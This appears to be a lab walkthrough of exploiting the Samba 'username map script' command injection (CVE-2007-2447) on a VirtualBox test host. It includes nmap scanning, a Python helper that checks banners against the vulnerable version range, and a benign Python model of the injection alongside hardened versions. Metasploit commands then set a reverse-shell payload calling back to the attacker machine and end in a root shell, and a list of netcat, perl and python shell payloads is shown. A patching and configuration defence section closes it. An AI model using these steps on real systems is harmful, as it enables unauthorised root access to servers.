Introduction to Samba
Samba is free software that implements the SMB protocol on Linux and UNIX systems; it consists of a server and client programs. SMB (Server Message Block) is a protocol for sharing files and printers over a local network: it lets the different machines on a LAN share files, printers and other resources.
It normally listens on TCP ports 139 and 445.
Probing the target Samba service
Use nmap -sV -p 139,445 <target IP> to fingerprint the services on the target ports. Note that -sV on its own only yields the coarse banner "Samba smbd 3.X - 4.X", which is not enough to place the host inside the vulnerable range; to get the exact build, add the smb-os-discovery NSE script (nmap -p 445 --script smb-os-discovery <target IP>), which reports the version string Samba itself advertises (for example "Samba 3.0.20-Debian").
➜ ~ nmap -sV -p 139,445 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:16 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
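Triage helper, added here and not part of the original post: it classifies Samba version banners against the range the Metasploit module targets, ordering release candidates before the final release so that 3.0.25rc3 is still flagged while 3.0.25 is not. The sample banner lines are constructed (one mirrors the nmap -sV line above, the others imitate the "OS: Unix (Samba x.y.z)" form that smb-os-discovery prints); nothing is sent over the network.

```python
import re

# Vulnerable range for the "username map script" command injection
# (CVE-2007-2447): Samba 3.0.20 through 3.0.25rc3 inclusive.
# Version key: (major, minor, patch, stage, sub), stage 0 = release candidate,
# stage 1 = final; sub = rc number, or letter suffix as a number (3.0.26a -> 1).
# Hence 3.0.25rc3 < 3.0.25 < 3.0.26 < 3.0.26a under plain tuple comparison.
VULN_LOW = (3, 0, 20, 1, 0)    # 3.0.20
VULN_HIGH = (3, 0, 25, 0, 3)   # 3.0.25rc3

_VER_RE = re.compile(
    r"Samba\s+(?:smbd\s+)?(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?",
    re.IGNORECASE,
)

# Constructed sample lines: the first is the nmap -sV banner from the scan above,
# the rest imitate smb-os-discovery output for several builds.
SAMPLE_BANNERS = [
    "445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)",
    "|   OS: Unix (Samba 3.0.20-Debian)",
    "|   OS: Unix (Samba 3.0.25rc3)",
    "|   OS: Unix (Samba 3.0.25)",
    "|   OS: Unix (Samba 3.0.26a)",
    "|   OS: Unix (Samba 4.9.5-Debian)",
]


def parse_samba_version(banner):
    """Return the version key for a banner, or None when the banner carries no
    exact x.y.z version (nmap -sV's 'Samba smbd 3.X - 4.X' is such a case)."""
    m = _VER_RE.search(banner)
    if m is None:
        return None
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    if m.group(4) is not None:                 # release candidate
        return (major, minor, patch, 0, int(m.group(4)))
    letter = (m.group(5) or "").lower()        # 3.0.26a style suffix
    sub = (ord(letter) - ord("a") + 1) if letter else 0
    return (major, minor, patch, 1, sub)


def is_vulnerable(banner):
    """True/False for an exact version; None when the banner is too coarse."""
    key = parse_samba_version(banner)
    if key is None:
        return None
    return VULN_LOW <= key <= VULN_HIGH


def triage(lines):
    """Map each banner line to 'vulnerable', 'not vulnerable' or 'unknown'."""
    verdicts = {}
    for line in lines:
        v = is_vulnerable(line)
        verdicts[line] = "unknown" if v is None else ("vulnerable" if v else "not vulnerable")
    return verdicts


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_BANNERS).items():
        print(f"{verdict:15} {line.strip()}")
```

An "unknown" verdict means go back and collect the precise version before spending time on the exploit; the module only works inside the range, so the coarse -sV banner alone is not a go/no-go signal.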
Exploitation with Metasploit
Metasploit ships an exploit module for the Samba "username map script" RCE.
exploit/multi/samba/usermap_script exploits a command-execution flaw (CVE-2007-2447) in Samba 3.0.20 through 3.0.25rc3. When the non-default "username map script" smb.conf option is set, smbd hands the SMB username to that script through a shell, so a username containing shell metacharacters is executed as a command; the module sends a username of the form /=`nohup <command>`. No authentication is required, because the option exists to map usernames before authentication takes place.
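To make the mechanism concrete, here is an added illustration in Python (not Samba's or Metasploit's code). It models the mapping hook: MAP_SCRIPT is a hypothetical stand-in for the administrator's mapping script, with echo chosen so that the returned name reveals whether a shell expanded anything in between; the injected command is a harmless echo rather than the reverse shell the module would send. The vulnerable path splices the username into a command line for /bin/sh, the hardened path passes it as a single argv element with no shell and also rejects names outside an allowlist.

```python
import re
import subprocess

# Hypothetical stand-in for the admin-written "username map script".
# A real deployment points this at a script that prints the mapped Unix user.
MAP_SCRIPT = "echo"

# Illustrative allowlist for the hardened path; tighten it to your naming scheme.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def malicious_username(cmd):
    """Username in the shape the Metasploit module sends: '/=`CMD`'.
    (The module wraps CMD in nohup so the payload outlives the SMB session.)"""
    return f"/=`{cmd}`"


def map_username_vulnerable(username, script=MAP_SCRIPT):
    """Pre-3.0.25 behaviour: the SMB username is spliced into a command line
    that /bin/sh interprets, so backticks and other metacharacters run as code."""
    out = subprocess.run(f"{script} {username}", shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def map_username_no_shell(username, script=MAP_SCRIPT):
    """Same hook without a shell: the name travels as one argv element, so the
    script receives the backticks literally and nothing is expanded."""
    out = subprocess.run([script, username], capture_output=True, text=True)
    return out.stdout.strip()


def map_username_hardened(username, script=MAP_SCRIPT):
    """Belt and braces: refuse names outside the allowlist, then call without a shell."""
    if SAFE_NAME.fullmatch(username) is None:
        raise ValueError(f"refusing username with shell metacharacters: {username!r}")
    return map_username_no_shell(username, script)


if __name__ == "__main__":
    evil = malicious_username("echo INJECTED")          # benign stand-in for the payload
    print("vulnerable:", map_username_vulnerable(evil))  # /=INJECTED  (command ran)
    print("no shell  :", map_username_no_shell(evil))    # /=`echo INJECTED` (literal)
    try:
        map_username_hardened(evil)
    except ValueError as err:
        print("hardened  :", err)
    print("benign    :", map_username_hardened("alice"))  # alice
```

The "/=" prefix is not magic: it just keeps the injected name looking like a path-style mapping entry while the backticks do the work. The argv form on its own already removes the injection; the allowlist is there so an unexpected name fails loudly in the log rather than reaching the script at all.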
1. Start msfconsole
➜ ~ msfconsole
[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2. Load the exploit/multi/samba/usermap_script module and set the target
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3. Pick a compatible payload (the module delivers a Unix command string, so only cmd/unix payloads are offered)
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set lhost 10.0.2.12
lhost => 10.0.2.12
4. Check the configuration
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
5. Run the exploit (the shell runs with smbd's privileges, which is root here, as the id output below shows)
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.0.2.12:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QjHmlGUEJtamvm3u;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "QjHmlGUEJtamvm3u\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.12:4444 -> 10.0.2.5:49680) at 2019-07-13 09:31:24 -0400
id
uid=0(root) gid=0(root)
How to defend?
Fix: upgrade Samba to 3.0.25 or later, where the flaw is patched. Until that is done, remove the username map script option from the [global] section of smb.conf (confirm with testparm -s | grep "username map script") and restrict TCP 139/445 to the hosts that need them. The option is off by default, so a server that never enabled it is not exploitable by this module.
Recommended roundup post: Vulnerability exploitation techniques roundup